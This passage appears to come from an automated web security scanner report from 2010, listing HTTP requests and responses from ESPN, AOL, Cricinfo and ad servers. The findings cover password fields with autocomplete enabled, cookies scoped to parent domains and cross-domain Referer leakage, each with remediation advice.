GET /espn3/index/_/sport/basketball HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sun, 07 Nov 2010 05:46:08 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sun, 07 Nov 2010 05:21:36 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN01 Cache-Expires: Sun, 07 Nov 2010 05:29:56 GMT Content-Length: 152684 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
The page contains a form with the following action URL:
http://espn.go.com/espn3/index/_/sport/football
The form contains the following password field with autocomplete enabled:
password
Request
GET /espn3/index/_/sport/football HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sun, 07 Nov 2010 05:46:30 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sun, 07 Nov 2010 05:40:33 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN11 Cache-Expires: Sun, 07 Nov 2010 05:49:11 GMT Content-Length: 320269 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
The page contains a form with the following action URL:
http://espn.go.com/espn3/index/_/sport/index
The form contains the following password field with autocomplete enabled:
password
Request
GET /espn3/index/_/sport/index HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sun, 07 Nov 2010 05:46:30 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 17:51:37 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN07 Cache-Expires: Sat, 06 Nov 2010 17:59:57 GMT Content-Length: 787554 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /vanity/?ts=1289110282906&h=www.aol.com&v=9&t=AOL.com%20-%20Welcome%20to%20AOL&r=http%3A%2F%2Fcreativeby2.unicast.com%2Fassets%2FA23%2FN1405%2FM9880%2FC337926%2FAOL_Orange_300x250_imu_swf.swf&l=0&ms=1&dL_ch=us.aolportal&ver=1&dL_dpt=newaol%20portal5%20AOL.com%20Main%2010x7&template=main&cobrand=portal5&plids=145774%7Centertainmentnews%7Ccwell%7C5%2C182420%7Cfinancenews-promo%7Ccwell%7C4%2C182732%7Cdl1%7Ccwell%7C1%2C101839%7Centertainmentnewsrss%7Ccwell%7C5%2C182599%7Centertainmentnews-promo%7Ccwell%7C5%2C182700%7Csportsnews-promo%7Ccwell%7C6%2C99763%7Cadhocbottomjs%7Crcol%7C9%2C182741%7Csportsnews%7Ccwell%7C6%2C182724%7Ctopnews-promo%7Ccwell%7C2%2C182659%7Cfinancenews%7Ccwell%7C4%2C182739%7Ctopnews%7Ccwell%7C2%2C181656%7Cprodsvcs%7Clcol%7C3 HTTP/1.1 Host: b.aol.com Proxy-Connection: keep-alive Referer: http://www.aol.com/?ncid=bannadusaolp00000044 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b?rn=38922149&C1=2&C2=1000009&C4=http%3A%2F%2Fwww.aol.com%2F&C5=us.aolportal&C7=http%3A%2F%2Fwww.aol.com%2F&C8=AOL.com%20-%20Welcome%20to%20AOL HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.aol.com/?ncid=bannadusaolp00000044 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=cb1dc5-204.0.5.41-1286583196
Response
HTTP/1.1 204 No Content Content-Length: 0 Date: Sun, 07 Nov 2010 06:11:26 GMT Connection: close Set-Cookie: UID=cb1dc5-204.0.5.41-1286583196; expires=Tue, 06-Nov-2012 06:11:26 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /r?c2=3000005&d.c=gif&d.o=wdgespinternational&d.x=176193424&d.t=page&d.u=http%3A%2F%2Fwww.cricinfo.com%2Fci%2Fcontent%2Fpage%2F417881.html HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.cricinfo.com/ci/content/page/417881.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=cb1dc5-204.0.5.41-1286583196
Response
HTTP/1.1 200 OK Content-Length: 43 Content-Type: image/gif Date: Sun, 07 Nov 2010 06:09:59 GMT Connection: close Set-Cookie: UID=cb1dc5-204.0.5.41-1286583196; expires=Tue, 06-Nov-2012 06:09:59 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi=[CS]v1|266B2188051D0EF9-6000012CE00A6B91[CE]; Expires=Tue, 6 Nov 2012 06:11:28 GMT; Domain=.aol.com; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/aolcommem,aolsvc/1/H.21/s28736884680110?AQB=1&ndh=1&t=7/10/2010%201%3A11%3A26%200%20300&ns=aolllc&cl=63072000&pageName=acm%20%3A%20newaol%20main5%20AOL.com%205.0%20Main&g=http%3A//www.aol.com/%3Fncid%3Dbannadusaolp00000044&r=http%3A//www.aol.com/%3Fncid%3Dbannadusaolp00000044&cc=USD&ch=us.aolportal&v0=bannadusaolp00000044&events=event10&c1=acm%20%3A%20newaol%20main5%20AOL.com%205.0%20Main&c2=acm%20%3A%20&c3=gmt_5&c10=external%20web%20browser&c12=http%3A//www.aol.com/&c13=non-authenticated&c14=www.aol.com&v14=acm%3A45&c15=unavailable&c16=no_location&c17=theme_default-prism_main5&v18=bannadusaolp00000044&v19=bannadusaolp00000044&c20=newaol%20main5%20AOL.com%205.0%20Main&c24=uaid_1.da09552aea3511df901a37c95ae35e4c.ca17&c49=H.21-May2010%7Cmmx_1&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1128&bh=991&p=Google%20Gears%200.5.33.0%3BShockwave%20Flash%3BAdobe%20Acrobat%3BJava%20Deployment%20Toolkit%206.0.210.7%3BJava%28TM%29%20Platform%20SE%206%20U21%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1 Host: o.sa.aol.com Proxy-Connection: keep-alive Referer: http://www.aol.com/?ncid=bannadusaolp00000044 Cache-Control: max-age=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.da09552aea3511df901a37c95ae35e4c.ca17; CUNAUTHID=1.da09552aea3511df901a37c95ae35e4c.ca17; s_sess=%20s_eVar17%3DInitial%2520Engagement%3B%20s_eVar20%3Dbannadusaolp00000044%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B; s_pers=%20s_lastvisit%3D1289110284434%252Cbannadusaolp00000044%7C1296886284434%3B%20s_getnr%3D1289110286328-New%7C1352182286328%3B%20s_nrgvo%3DNew%7C1352182286333%3B
Response
HTTP/1.1 302 Found Date: Sun, 07 Nov 2010 06:11:28 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi=[CS]v1|266B2188051D0EF9-6000012CE00A6B91[CE]; Expires=Tue, 6 Nov 2012 06:11:28 GMT; Domain=.aol.com; Path=/ Location: http://o.sa.aol.com/b/ss/aolcommem,aolsvc/1/H.21/s28736884680110?AQB=1&pccr=true&vidn=266B2188051D0EF9-6000012CE00A6B91&&ndh=1&t=7/10/2010%201%3A11%3A26%200%20300&ns=aolllc&cl=63072000&pageName=acm%20%3A%20newaol%20main5%20AOL.com%205.0%20Main&g=http%3A//www.aol.com/%3Fncid%3Dbannadusaolp00000044&r=http%3A//www.aol.com/%3Fncid%3Dbannadusaolp00000044&cc=USD&ch=us.aolportal&v0=bannadusaolp00000044&events=event10&c1=acm%20%3A%20newaol%20main5%20AOL.com%205.0%20Main&c2=acm%20%3A%20&c3=gmt_5&c10=external%20web%20browser&c12=http%3A//www.aol.com/&c13=non-authenticated&c14=www.aol.com&v14=acm%3A45&c15=unavailable&c16=no_location&c17=theme_default-prism_main5&v18=bannadusaolp00000044&v19=bannadusaolp00000044&c20=newaol%20main5%20AOL.com%205.0%20Main&c24=uaid_1.da09552aea3511df901a37c95ae35e4c.ca17&c49=H.21-May2010%7Cmmx_1&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1128&bh=991&p=Google%20Gears%200.5.33.0%3BShockwave%20Flash%3BAdobe%20Acrobat%3BJava%20Deployment%20Toolkit%206.0.210.7%3BJava%28TM%29%20Platform%20SE%206%20U21%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 X-C: ms-4.3 Expires: Sat, 06 Nov 2010 06:11:28 GMT Last-Modified: Mon, 08 Nov 2010 06:11:28 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www303 Content-Length: 0 Content-Type: text/plain
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi=[CS]v1|266B2187851D1483-60000138C02CAF48[CE]; Expires=Tue, 6 Nov 2012 06:11:27 GMT; Domain=.aol.com; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/aolcommem,aolsvc/1/H.21/s2959826072212?AQB=1&ndh=1&t=7/10/2010%201%3A11%3A24%200%20300&ns=aolllc&cl=63072000&pageName=acm%20%3A%20newaol%20portal5%20AOL.com%20Main%2010x7&g=http%3A//www.aol.com/%3Fncid%3Dbannadusaolp00000044&r=http%3A//creativeby2.unicast.com/assets/A23/N1405/M9880/C337926/AOL_Orange_300x250_imu_swf.swf&cc=USD&ch=us.aolportal&v0=bannadusaolp00000044&events=event10%2Cevent12&c1=acm%20%3A%20newaol%20portal5%20AOL.com%20Main%2010x7&c2=acm%20%3A%20&c3=gmt_5&c10=external%20web%20browser&c12=http%3A//www.aol.com/&c13=non-authenticated&c14=creativeby2.unicast.com&v14=acm%3Adp&c15=unavailable&c17=default-ace&v17=Initial%20Engagement&v18=bannadusaolp00000044&v19=bannadusaolp00000044&c20=newaol%20portal5%20AOL.com%20Main%2010x7&v20=bannadusaolp00000044&c24=uaid_na&c49=H.21-May2010%7Cmmx_1&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1128&bh=991&p=Google%20Gears%200.5.33.0%3BShockwave%20Flash%3BAdobe%20Acrobat%3BJava%20Deployment%20Toolkit%206.0.210.7%3BJava%28TM%29%20Platform%20SE%206%20U21%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1 Host: o.sa.aol.com Proxy-Connection: keep-alive Referer: http://www.aol.com/?ncid=bannadusaolp00000044 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_eVar17%3DInitial%2520Engagement%3B%20s_eVar20%3Dbannadusaolp00000044%3B; s_pers=%20s_lastvisit%3D1289110284434%252Cbannadusaolp00000044%7C1296886284434%3B%20s_getnr%3D1289110284455-New%7C1352182284455%3B%20s_nrgvo%3DNew%7C1352182284460%3B
Response
HTTP/1.1 302 Found Date: Sun, 07 Nov 2010 06:11:27 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi=[CS]v1|266B2187851D1483-60000138C02CAF48[CE]; Expires=Tue, 6 Nov 2012 06:11:27 GMT; Domain=.aol.com; Path=/ Location: http://o.sa.aol.com/b/ss/aolcommem,aolsvc/1/H.21/s2959826072212?AQB=1&pccr=true&vidn=266B2187851D1483-60000138C02CAF48&&ndh=1&t=7/10/2010%201%3A11%3A24%200%20300&ns=aolllc&cl=63072000&pageName=acm%20%3A%20newaol%20portal5%20AOL.com%20Main%2010x7&g=http%3A//www.aol.com/%3Fncid%3Dbannadusaolp00000044&r=http%3A//creativeby2.unicast.com/assets/A23/N1405/M9880/C337926/AOL_Orange_300x250_imu_swf.swf&cc=USD&ch=us.aolportal&v0=bannadusaolp00000044&events=event10%2Cevent12&c1=acm%20%3A%20newaol%20portal5%20AOL.com%20Main%2010x7&c2=acm%20%3A%20&c3=gmt_5&c10=external%20web%20browser&c12=http%3A//www.aol.com/&c13=non-authenticated&c14=creativeby2.unicast.com&v14=acm%3Adp&c15=unavailable&c17=default-ace&v17=Initial%20Engagement&v18=bannadusaolp00000044&v19=bannadusaolp00000044&c20=newaol%20portal5%20AOL.com%20Main%2010x7&v20=bannadusaolp00000044&c24=uaid_na&c49=H.21-May2010%7Cmmx_1&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1128&bh=991&p=Google%20Gears%200.5.33.0%3BShockwave%20Flash%3BAdobe%20Acrobat%3BJava%20Deployment%20Toolkit%206.0.210.7%3BJava%28TM%29%20Platform%20SE%206%20U21%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 X-C: ms-4.3 Expires: Sat, 06 Nov 2010 06:11:27 GMT Last-Modified: Mon, 08 Nov 2010 06:11:27 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www398 Content-Length: 0 Content-Type: text/plain
13. Cross-domain Referer leakagepreviousnext There are 21 instances of this issue:
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
GET /adj/espncricinfo_global/fixtures;pos=bottom;kvcluster=usa;kvpt=index;kvsite=global;kvobject=;kvbrand=ci;tile=4;sz=300x250;ord=9093712624162436? HTTP/1.1 Host: ad.vulnerable.ad.partner Proxy-Connection: keep-alive Referer: http://www.cricinfo.com/ci/content/current/match/fixtures_futures.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 07 Nov 2010 06:10:01 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 443
document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a4b/0/0/%2a/n;231049334;0-0;0;55267024;4307-300/250;36393408/36411288/1;;~fdr=232155077;0-0;0;46512185;4307-300/250;38852498/38870255/1;;~sscs=%3fhttps://asia.citi.com/india/money_transfer/default.html?eOfferCode=CFOCGE32&site=Cricinfo"><img src="http://s0.2mdn.net/viewad/2626396/greatexchangerate_300x250.gif" border=0 alt="Click here to find out more!"></a> ...[SNIP]...
GET /adj/espncricinfo_global/global;kvcluster=usa;kvpt=index;kvsite=global;kvbrand=ci;tile=2;sz=125x125;ord=7037193966098130? HTTP/1.1 Host: ad.vulnerable.ad.partner Proxy-Connection: keep-alive Referer: http://www.cricinfo.com/ci/content/page/417881.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 07 Nov 2010 06:09:51 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 337
document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a4b/0/0/%2a/x;222218985;0-0;0;46483263;3-125/125;36444325/36462233/1;;~sscs=%3fhttp://www.cricinfo.com/ci/content/site/451900.html"><img src="http://s0.2mdn.net/viewad/2634245/LegendsOfCricket_125x125.jpg" border=0 alt="Click here to find out more!"></a> ...[SNIP]...
GET /adj/espncricinfo_global/global;kvcluster=usa;kvpt=index;kvsite=global;kvbrand=ci;tile=1;sz=728x90;ord=7037193966098130? HTTP/1.1 Host: ad.vulnerable.ad.partner Proxy-Connection: keep-alive Referer: http://www.cricinfo.com/ci/content/page/417881.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 07 Nov 2010 06:09:47 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 317
document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a4b/0/0/%2a/i;223022281;0-0;0;46483263;3454-728/90;35843856/35861710/1;;~sscs=%3fhttp://espnf1.fantasyleague.com/"><img src="http://s0.2mdn.net/viewad/2669937/ESPNF1_Fantasy_728x90.gif" border=0 alt="Click here to find out more!"></a> ...[SNIP]...
GET /adj/espncricinfo_global/recentresults;pos=bottom;kvcluster=usa;kvpt=index;kvsite=global;kvobject=;kvbrand=ci;tile=4;sz=300x250;ord=3271126106847077.5? HTTP/1.1 Host: ad.vulnerable.ad.partner Proxy-Connection: keep-alive Referer: http://www.cricinfo.com/ci/engine/current/match/scores/recent.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 07 Nov 2010 06:10:00 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 331
document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a4b/0/0/%2a/c;222798426;5-0;0;46483020;4307-300/250;35590986/35608804/1;;~sscs=%3fhttp://soccernet.espn.go.com/index"><img src="http://s0.2mdn.net/viewad/2634245/266987/Soccernet_Generic_300X250.jpg" border=0 alt="Click here to find out more!"></a> ...[SNIP]...
GET /adj/espncricinfo_global/recentresults;kvcluster=usa;kvpt=index;kvsite=global;kvobject=;kvbrand=ci;tile=2;sz=125x125;ord=3271126106847077.5? HTTP/1.1 Host: ad.vulnerable.ad.partner Proxy-Connection: keep-alive Referer: http://www.cricinfo.com/ci/engine/current/match/scores/recent.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 07 Nov 2010 06:09:58 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 337
document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a4b/0/0/%2a/x;222218985;0-0;0;46483020;3-125/125;36444325/36462233/1;;~sscs=%3fhttp://www.cricinfo.com/ci/content/site/451900.html"><img src="http://s0.2mdn.net/viewad/2634245/LegendsOfCricket_125x125.jpg" border=0 alt="Click here to find out more!"></a> ...[SNIP]...
GET /adj/espncricinfo_livescorecard/livescoreindex;kvcluster=usa;kvpt=scoreindex;kvsite=global;kvbrand=ci;tile=2;sz=125x125;ord=4293150748126209? HTTP/1.1 Host: ad.vulnerable.ad.partner Proxy-Connection: keep-alive Referer: http://www.cricinfo.com/ci/engine/current/match/scores/live.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1
Response
